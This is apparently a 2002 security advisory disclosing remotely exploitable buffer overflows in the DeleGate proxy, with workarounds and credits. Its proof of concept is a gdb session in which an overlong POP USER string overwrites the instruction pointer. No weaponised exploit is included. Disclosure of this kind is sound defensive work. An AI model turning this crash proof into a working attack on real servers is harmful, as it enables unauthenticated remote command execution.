-------------------------------------------------------------------------- Global InterSec LLC http://www.globalintersec.com -------------------------------------------------------------------------- GIS Advisory ID: 2002012101 Changed: 07/02/2002 Author: research@globalintersec.com Reference: http://www.globalintersec.com/adv/delegate-2002012101.txt -------------------------------------------------------------------------- Summary: DeleGate - A popular application layer proxy contains a number of buffer overflows which are remotely exploitable. Impact: A remote attacker may execute arbitrary commands. Versions: All through to the current version. Description: DeleGate is made up from several components which together proxy various services. These include pop, http and https. Global InterSec found a number of vulnerabilities in the various proxy components, all of which could lead to remote command execution and privilege escalation. DeleGate seems to have quite a history of problems (see Credit section) and potentially many more vulnerabilities than described within this advisory. The author has addressed many of the previous problems by attempting to randomise the stack area. However as we have proved, this work-around is non-comparable to re-writing the vulnerable areas of code. Less serious vulnerabilities also exist in DeleGate including real path disclosure within chrooted ftp environments and cross site scripting vulnerabilities in DeleGates http(s) proxy code. Due to the sheer number of exploitable vulnerabilities we found, we've opted to release a single advisory, exemplifying one of the issues. Scope for attack: Proxies are often placed on networks to protect sensitive systems and networks from exposure to public networks. To this end, systems running proxies are often in privileged parts of networks, where they are able to proxy services on more sensitive systems, whether they be in a DMZ or otherwise. In the case of the POP proxy overflow, exploitation requires no authentication. The only constraint may be tcp wrapping for that service. Successful exploitation of the buffer overflows within the popper proxy code would lead to an ability to execute commands as the user of the daemon process, this is by default nobody however DeleGate can be configured to run as any user. Work around: If DeleGate is critical to your networks operation, we suggest the use of tcp wrappers as a TEMPORARY solution, until an alternate solution is found. In the case of ftp/http/https we suggest the use of squid. URL: http://www.squid-cache.org/ tcpproxy is also available, however it is not an application gateway level proxy, simply forwarding tcp connections. URL: http://www.quietsche-entchen.de/software/tcpproxy.html Credit: Vulnerabilities detailed in this advisory were discovered by Tom Parker (Global InterSec LLC). Previous vulnerabilities in DeleGate http://www.synnergy.net/downloads/exploits/delegate.c http://www.securiteam.com/exploits/3W5Q2RFQ0E.html The existence an exploit for the current release of DeleGate is rumoured. Vendor Status: None as yet: It seems the authors answer to most of the problems previously found in DeleGate were work around's such as his stack randomisation functions, so don't hold your breath for an official patch. Global InterSec *are* working on a diff file to solve some of the problems - however due to the sheer number of them it wont be available immediately. When available it will be linked to at the url at the top of this advisory. Exploits (Proof of concept): As described above, the below proof of concept details DeleGate's function as a POP proxy. The below SIGSEGV occurs due to the use of globally declared array size, ie: pop.c:28:#define LNSIZE 1024 This is used to set sizes of a number of arrays, including that of the username and password. As with many of the vulnerabilities in DeleGate, a SIGSEGV occurs when attempting to strcpy() unexpectedly long strings. In spite of attempts DeleGate makes to randomise the stack, we were successful in overwriting the Extended instruction pointer. Although the stack randomisation functions make things harder, they do not make arbitrary command execution impossible. Attacking target `xxx.xxxx.xxx.xxx`: : +OK Proxy-POP server (DeleGate/7.7.1 by ysato@delegate.org) at xxx.xxx.xxx.xxx starting. Sleeping for 20 seconds, attach gdb ;-) root@foo:/home/foo/delegate7.7.1/src > ps -ax | grep DeleGate 30215 ? S 0:00 DeleGate -{016+00:foo.bar.com}[pop://-/]-Pxxx.xxx.xxx.xxx:110 -- root@foo:/home/foo/delegate7.7.1/src > gdb delegated GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-suse-linux"... (gdb) at 30215 Attaching to program: /home/foo/delegate7.7.1/src/delegated, Pid 30179 Reading symbols from /lib/libnsl.so.1...done. Loaded symbols for /lib/libnsl.so.1 Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from /lib/libnss_compat.so.2...done. Loaded symbols for /lib/libnss_compat.so.2 Reading symbols from /lib/libnss_files.so.2...done. Loaded symbols for /lib/libnss_files.so.2 Reading symbols from /lib/libnss_dns.so.2...done. Loaded symbols for /lib/libnss_dns.so.2 Reading symbols from /lib/libresolv.so.2...done. Loaded symbols for /lib/libresolv.so.2 0x40101167 in poll () from /lib/libc.so.6 -> USER AAAAAAAAAAAA<~1024 Bytes> (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) print $eip $1 = (void *) 0x41414141 (gdb) In the case of a *real* exploit, the EIP could be a pointer to the attackers shellcode which would already be in memory. Exploit: Yea right ;-) Legal: This advisory is the intellectual property of Global InterSec LLC but may be freely distributed with the conditions that: a) no fee is charged b) appropriate credit is given. c) distribution of the advisory does not break NDA's issued by GIS. Global InterSec LLC 2002
